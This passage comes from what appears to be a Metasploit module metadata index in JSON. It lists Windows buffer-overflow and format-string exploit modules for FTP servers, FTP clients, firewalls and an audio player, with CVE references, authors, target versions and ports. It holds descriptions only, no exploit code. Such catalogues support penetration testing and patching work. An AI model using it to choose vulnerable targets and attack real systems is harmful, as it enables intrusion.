"full_name": "exploit/windows/fileformat/zinfaudioplayer221_pls",
"rank": 400,
"disclosure_date": "2004-09-24",
"type": "exploit",
"author": [
"Trancek <trancek@yashira.org>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.\n An attacker must send the file to the victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Zinf.\n This functionality has not been tested in this module.",
"references": [
"CVE-2004-0964",
"OSVDB-10416",
"EDB-7888",
"BID-11248"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Zinf Universal 2.2.1"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/zinfaudioplayer221_pls",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/firewall/blackice_pam_icq": {
"name": "ISS PAM.dll ICQ Parser Buffer Overflow",
"full_name": "exploit/windows/firewall/blackice_pam_icq",
"rank": 500,
"disclosure_date": "2004-03-18",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This module exploits a stack buffer overflow in the ISS products that use\n the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation\n will result in arbitrary code execution as LocalSystem. This exploit\n only requires 1 UDP packet, which can be both spoofed and sent to a broadcast\n address.\n\n The ISS exception handler will recover the process after each overflow, giving\n us the ability to bruteforce the service and exploit it multiple times.",
"references": [
"CVE-2004-0362",
"OSVDB-4355",
"URL-http://www.eeye.com/html/Research/Advisories/AD20040318.html"
],
"platform": "Windows",
"arch": "",
"rport": 1,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Bruteforce",
"Bruteforce iis-pam1.dll",
"Bruteforce NT 4.0",
"iis-pam1.dll 3.6.06",
"iis-pam1.dll 3.6.11",
"WinNT SP3/SP4/SP5",
"WinNT SP4/SP5",
"WinNT SP5/SP6 - advapi32",
"WinNT SP3/SP5/SP6 - shell32",
"WinNT SP5/SP6 - mswsock",
"WinXP SP0/SP1 - shell32",
"WinXP SP0/SP1 - atl",
"WinXP SP0/SP1 - atl",
"WinXP SP0/SP1 - ws2_32",
"WinXP SP0/SP1 - mswsock",
"Windows 2000 Pro SP4 English",
"Win2000 SP0 - SP4",
"Win2000 SP2/SP3 - samlib",
"Win2000 SP0/SP1 - activeds",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English",
"WinXP SP0 - SP1",
"Win2003 SP0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/firewall/blackice_pam_icq.rb",
"is_install_path": true,
"ref_name": "windows/firewall/blackice_pam_icq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/firewall/kerio_auth": {
"name": "Kerio Firewall 2.1.4 Authentication Packet Overflow",
"full_name": "exploit/windows/firewall/kerio_auth",
"rank": 200,
"disclosure_date": "2003-04-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Kerio Personal Firewall\n administration authentication process. This module has only been tested\n against Kerio Personal Firewall 2 (2.1.4).",
"references": [
"CVE-2003-0220",
"OSVDB-6294",
"BID-7180"
],
"platform": "Windows",
"arch": "",
"rport": 44334,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/firewall/kerio_auth.rb",
"is_install_path": true,
"ref_name": "windows/firewall/kerio_auth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/32bitftp_list_reply": {
"name": "32bit FTP Client Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/32bitftp_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"fancy",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to\n download a file that has an overly long filename.",
"references": [
"OSVDB-68703",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/32bitftp_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/32bitftp_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/3cdaemon_ftp_user": {
"name": "3Com 3CDaemon 2.0 FTP Username Overflow",
"full_name": "exploit/windows/ftp/3cdaemon_ftp_user",
"rank": 200,
"disclosure_date": "2005-01-04",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"otr"
],
"description": "This module exploits a vulnerability in the 3Com 3CDaemon\n FTP service. This package is being distributed from the 3Com\n web site and is recommended in numerous support documents.\n This module uses the USER command to trigger the overflow.",
"references": [
"CVE-2005-0277",
"OSVDB-12810",
"OSVDB-12811",
"BID-12155"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows 2000 English",
"Windows XP English SP0/SP1",
"Windows NT 4.0 SP4/SP5/SP6",
"Windows 2000 Pro SP4 French",
"Windows XP English SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/3cdaemon_ftp_user",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/aasync_list_reply": {
"name": "AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)",
"full_name": "exploit/windows/ftp/aasync_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when\n processing the response on a LIST command. During the overflow, a structured exception\n handler record gets overwritten.",
"references": [
"OSVDB-68701",
"EDB-16738",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP SP3 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/aasync_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/aasync_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ability_server_stor": {
"name": "Ability Server 2.34 STOR Command Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/ability_server_stor",
"rank": 300,
"disclosure_date": "2004-10-22",
"type": "exploit",
"author": [
"muts",
"Dark Eagle",
"Peter Osterberg"
],
"description": "This module exploits a stack-based buffer overflow in Ability Server 2.34.\n Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,\n which leads to a stack based buffer overflow. This module uses the 'STOR' command.\n\n The vulnerability has been confirmed on version 2.34 and has also been reported\n in version 2.25 and 2.32. Other versions may also be affected.",
"references": [
"CVE-2004-1626",
"OSVDB-11030",
"EDB-588"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows XP SP2 ENG",
"Windows XP SP3 ENG"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ability_server_stor.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ability_server_stor",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/ftp/absolute_ftp_list_bof": {
"name": "AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/absolute_ftp_list_bof",
"rank": 300,
"disclosure_date": "2011-11-09",
"type": "exploit",
"author": [
"Node"
],
"description": "This module exploits VanDyke Software AbsoluteFTP by overflowing\n a filename buffer related to the LIST command.",
"references": [
"CVE-2011-5164",
"OSVDB-77105",
"EDB-18102"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb",
"is_install_path": true,
"ref_name": "windows/ftp/absolute_ftp_list_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ayukov_nftp": {
"name": "Ayukov NFTP FTP Client Buffer Overflow",
"full_name": "exploit/windows/ftp/ayukov_nftp",
"rank": 300,
"disclosure_date": "2017-10-21",
"type": "exploit",
"author": [
"Berk Cem Goksel",
"Daniel Teixeira",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTP FTP\n Client 2.0 and earlier. By responding with a long string of data for the SYST request, it\n is possible to cause a denial-of-service condition on the FTP client, or arbitrary remote\n code execution under the context of the user if successfully exploited.",
"references": [
"CVE-2017-15222",
"EDB-43025"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP3 English"
],
"mod_time": "2018-01-03 20:52:57 +0000",
"path": "/modules/exploits/windows/ftp/ayukov_nftp.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ayukov_nftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/bison_ftp_bof": {
"name": "BisonWare BisonFTP Server Buffer Overflow",
"full_name": "exploit/windows/ftp/bison_ftp_bof",
"rank": 300,
"disclosure_date": "2011-08-07",
"type": "exploit",
"author": [
"localh0t",
"veerendragg <veerendragg @ SecPod>",
"Jay Turla"
],
"description": "BisonWare BisonFTP Server 3.5 is prone to an overflow condition.\n This module exploits a buffer overflow vulnerability in the said\n application.",
"references": [
"CVE-1999-1510",
"BID-49109",
"EDB-17649",
"URL-http://secpod.org/msf/bison_server_bof.rb"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Bisonware FTP Server / Windows XP SP3 EN"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/bison_ftp_bof.rb",
"is_install_path": true,
"ref_name": "windows/ftp/bison_ftp_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/cesarftp_mkd": {
"name": "Cesar FTP 0.99g MKD Command Buffer Overflow",
"full_name": "exploit/windows/ftp/cesarftp_mkd",
"rank": 200,
"disclosure_date": "2006-06-12",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.\n\n You must have valid credentials to trigger this vulnerability. Also, you\n only get one chance, so choose your target carefully.",
"references": [
"CVE-2006-2961",
"OSVDB-26364",
"BID-18586",
"URL-http://secunia.com/advisories/20574/"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows 2000 Pro SP4 French",
"Windows XP SP2/SP3 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/cesarftp_mkd.rb",
"is_install_path": true,
"ref_name": "windows/ftp/cesarftp_mkd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/comsnd_ftpd_fmtstr": {
"name": "ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability",
"full_name": "exploit/windows/ftp/comsnd_ftpd_fmtstr",
"rank": 400,
"disclosure_date": "2012-06-08",
"type": "exploit",
"author": [
"ChaoYi Huang <ChaoYi.Huang@connect.polyu.hk>",
"rick2600 <rick2600@corelan.be>",
"mr_me <mr_me@corelan.be>",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially\n crafted format string specifier as a username. The crafted username is sent to the server to\n overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer\n is triggered, the code bypasses DEP and then repairs the pointer to execute arbitrary code.\n The SEH exit function is preferred so that the administrators are not left with an unhandled\n exception message. When using the meterpreter payload, the process will never die, allowing\n for continuous exploitation.",
"references": [
"OSVDB-82798",
"EDB-19024"
],
"platform": "Windows",
"arch": "x86",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3 - English",
"Windows Server 2003 - English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb",
"is_install_path": true,
"ref_name": "windows/ftp/comsnd_ftpd_fmtstr",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/dreamftp_format": {
"name": "BolinTech Dream FTP Server 1.02 Format String",
"full_name": "exploit/windows/ftp/dreamftp_format",
"rank": 400,
"disclosure_date": "2004-03-03",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a format string overflow in the BolinTech\n Dream FTP Server version 1.02. Based on the exploit by SkyLined.",
"references": [
"CVE-2004-2074",
"OSVDB-4986",
"BID-9800",
"EDB-823"
],
"platform": "Windows",
"arch": "x86",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Dream FTP Server v1.02 Universal"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/ftp/dreamftp_format.rb",
"is_install_path": true,
"ref_name": "windows/ftp/dreamftp_format",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/easyfilesharing_pass": {
"name": "Easy File Sharing FTP Server 2.0 PASS Overflow",
"full_name": "exploit/windows/ftp/easyfilesharing_pass",
"rank": 200,
"disclosure_date": "2006-07-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Easy File Sharing 2.0\n service. By sending an overly long password, an attacker can execute\n arbitrary code.",
"references": [
"CVE-2006-3952",
"OSVDB-27646",
"BID-19243"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 Pro English ALL",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/easyfilesharing_pass.rb",
"is_install_path": true,
"ref_name": "windows/ftp/easyfilesharing_pass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/easyftp_cwd_fixret": {
"name": "EasyFTP Server CWD Command Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/easyftp_cwd_fixret",
"rank": 500,
"disclosure_date": "2010-02-16",
"type": "exploit",
"author": [
"Paul Makowski <my.hndl@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which\n leads to a stack based buffer overflow. EasyFTP allows anonymous access by\n default; valid credentials are typically unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I've referred to as 'fixRet'.\n This code allows us to inject a payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.",
"references": [
"OSVDB-62134",
"BID-38262",
"URL-http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/",
"URL-http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit",
"URL-https://seclists.org/bugtraq/2010/Feb/202"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows Universal - v1.7.0.2",
"Windows Universal - v1.7.0.3",
"Windows Universal - v1.7.0.4",
"Windows Universal - v1.7.0.5",
"Windows Universal - v1.7.0.6",
"Windows Universal - v1.7.0.7",
"Windows Universal - v1.7.0.8",
"Windows Universal - v1.7.0.9",
"Windows Universal - v1.7.0.10",
"Windows Universal - v1.7.0.11"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb",
"is_install_path": true,
"ref_name": "windows/ftp/easyftp_cwd_fixret",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/easyftp_list_fixret": {
"name": "EasyFTP Server LIST Command Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/easyftp_list_fixret",
"rank": 500,
"disclosure_date": "2010-07-05",
"type": "exploit",
"author": [
"Karn Ganeshan <karnganeshan@gmail.com>",
"MFR",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\n Credit goes to Karn Ganeshan.\n\n NOTE: Although this is likely to exploit the same vulnerability as the\n 'easyftp_cwd_fixret' exploit, it uses a slightly different vector.",
"references": [
"OSVDB-62134",
"EDB-14400",
"EDB-14451"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows XP SP3 - Version 2002"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/easyftp_list_fixret.rb",
"is_install_path": true,
"ref_name": "windows/ftp/easyftp_list_fixret",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/easyftp_mkd_fixret": {
"name": "EasyFTP Server MKD Command Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/easyftp_mkd_fixret",
"rank": 500,
"disclosure_date": "2010-04-04",
"type": "exploit",
"author": [
"x90c <geinblues@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which\n leads to a stack based buffer overflow.\n\n NOTE: EasyFTP allows anonymous access by default. However, in order to access the\n 'MKD' command, you must have access to an account that can create directories.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I've referred to as 'fixRet'.\n This code allows us to inject a payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.",
"references": [
"OSVDB-62134",
"EDB-12044",
"EDB-14399"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows Universal - v1.7.0.2",
"Windows Universal - v1.7.0.3",
"Windows Universal - v1.7.0.4",
"Windows Universal - v1.7.0.5",
"Windows Universal - v1.7.0.6",
"Windows Universal - v1.7.0.7",
"Windows Universal - v1.7.0.8",
"Windows Universal - v1.7.0.9",
"Windows Universal - v1.7.0.10",
"Windows Universal - v1.7.0.11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb",
"is_install_path": true,
"ref_name": "windows/ftp/easyftp_mkd_fixret",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/filecopa_list_overflow": {
"name": "FileCopa FTP Server Pre 18 Jul Version",
"full_name": "exploit/windows/ftp/filecopa_list_overflow",
"rank": 200,
"disclosure_date": "2006-07-19",
"type": "exploit",
"author": [
"Jacopo Cervini"
],
"description": "This module exploits the buffer overflow found in the LIST command\n in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch",
"references": [
"CVE-2006-3726",
"OSVDB-27389",
"BID-19065"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2k Server SP4 English",
"Windows XP Pro SP2 Italian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/filecopa_list_overflow.rb",
"is_install_path": true,
"ref_name": "windows/ftp/filecopa_list_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/filewrangler_list_reply": {
"name": "FileWrangler 5.30 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/filewrangler_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"nullthreat",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a buffer overflow in the FileWrangler client\n that is triggered when the client connects to a FTP server and lists\n the directory contents, containing an overly long directory name.",
"references": [
"OSVDB-94555",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/filewrangler_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/filewrangler_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/freefloatftp_user": {
"name": "Free Float FTP Server USER Command Buffer Overflow",
"full_name": "exploit/windows/ftp/freefloatftp_user",
"rank": 300,
"disclosure_date": "2012-06-12",
"type": "exploit",
"author": [
"D35m0nd142",
"Doug Prostko <dougtko@gmail.com>"
],
"description": "Freefloat FTP Server is prone to an overflow condition. It\n fails to properly sanitize user-supplied input resulting in a\n stack-based buffer overflow. With a specially crafted 'USER'\n command, a remote attacker can potentially have an unspecified\n impact.",
"references": [
"OSVDB-69621",
"EDB-23243"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"FreeFloat / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/freefloatftp_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/freefloatftp_user",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/freefloatftp_wbem": {
"name": "FreeFloat FTP Server Arbitrary File Upload",
"full_name": "exploit/windows/ftp/freefloatftp_wbem",
"rank": 600,
"disclosure_date": "2012-12-07",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses multiple issues in FreeFloat: 1. No credential is actually\n needed to login; 2. User's default path is in C:\\, and this cannot be changed;\n 3. User can write to anywhere on the server's file system. As a result of these\n poor implementations, a malicious user can just log in and then upload files,\n and let WMI (the Management Instrumentation service) execute the uploaded payload.",
"references": [
"OSVDB-88302",
"OSVDB-88303"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"FreeFloat"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/freefloatftp_wbem.rb",
"is_install_path": true,
"ref_name": "windows/ftp/freefloatftp_wbem",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/freeftpd_pass": {
"name": "freeFTPd PASS Command Buffer Overflow",
"full_name": "exploit/windows/ftp/freeftpd_pass",
"rank": 300,
"disclosure_date": "2013-08-20",
"type": "exploit",
"author": [
"Wireghoul",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "freeFTPd 1.0.10 and below contains an overflow condition that is triggered as\n user-supplied input is not properly validated when handling a specially crafted\n PASS command. This may allow a remote attacker to cause a buffer overflow,\n resulting in a denial of service or allow the execution of arbitrary code.\n\n freeFTPd must have an account configured to authorize the anonymous user account.",
"references": [
"OSVDB-96517",
"EDB-27747",
"BID-61905"
],
"platform": "Windows",
"arch": "x86",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"freeFTPd 1.0.10 and below on Windows Desktop Version"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/freeftpd_pass.rb",
"is_install_path": true,
"ref_name": "windows/ftp/freeftpd_pass",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/ftp/freeftpd_user": {
"name": "freeFTPd 1.0 Username Overflow",
"full_name": "exploit/windows/ftp/freeftpd_user",
"rank": 200,
"disclosure_date": "2005-11-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the freeFTPd\n multi-protocol file transfer service. This flaw can only be\n exploited when logging has been enabled (non-default).",
"references": [
"CVE-2005-3683",
"OSVDB-20909",
"BID-15457"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows 2000 English ALL",
"Windows XP Pro SP0/SP1 English",
"Windows NT SP5/SP6a English",
"Windows 2003 Server English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/freeftpd_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/freeftpd_user",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ftpgetter_pwd_reply": {
"name": "FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)",
"full_name": "exploit/windows/ftp/ftpgetter_pwd_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"ekse",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.\n When processing the response on a PWD command, a stack based buffer overflow occurs.\n This leads to arbitrary code execution when a structured exception handler gets\n overwritten.",
"references": [
"OSVDB-68638",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP SP3 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftpgetter_pwd_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ftppad_list_reply": {
"name": "FTPPad 1.2.0 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/ftppad_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"corelanc0d3r"
],
"description": "This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is\n triggered when the client connects to a FTP server which sends an overly long directory\n and filename in response to a LIST command.\n\n This will cause an access violation, and will eventually overwrite the saved extended\n instruction pointer. Payload can be found at EDX+5c and ESI+5c, so a little pivot/\n sniper was needed to make this one work.",
"references": [
"OSVDB-68714",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP SP3 Professional, English - shlwapi 6.00.2900.5912",
"XP SP3 Professional, German - shlwapi 6.00.2900.5912",
"XP SP3 Professional, English - shlwapi 6.00.2900.5512"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ftppad_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftppad_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ftpshell51_pwd_reply": {
"name": "FTPShell 5.1 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/ftpshell51_pwd_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets\n triggered when the ftp client tries to process an overly long response to a PWD\n command. This will overwrite the saved EIP and structured exception handler.",
"references": [
"OSVDB-68639",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Universal"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftpshell51_pwd_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ftpshell_cli_bof": {
"name": "FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/ftpshell_cli_bof",
"rank": 300,
"disclosure_date": "2017-03-04",
"type": "exploit",
"author": [
"r4wd3r",
"Daniel Teixeira"
],
"description": "This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise\n edition) allowing remote code execution.",
"references": [
"CVE-2018-7573",
"EDB-44596"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
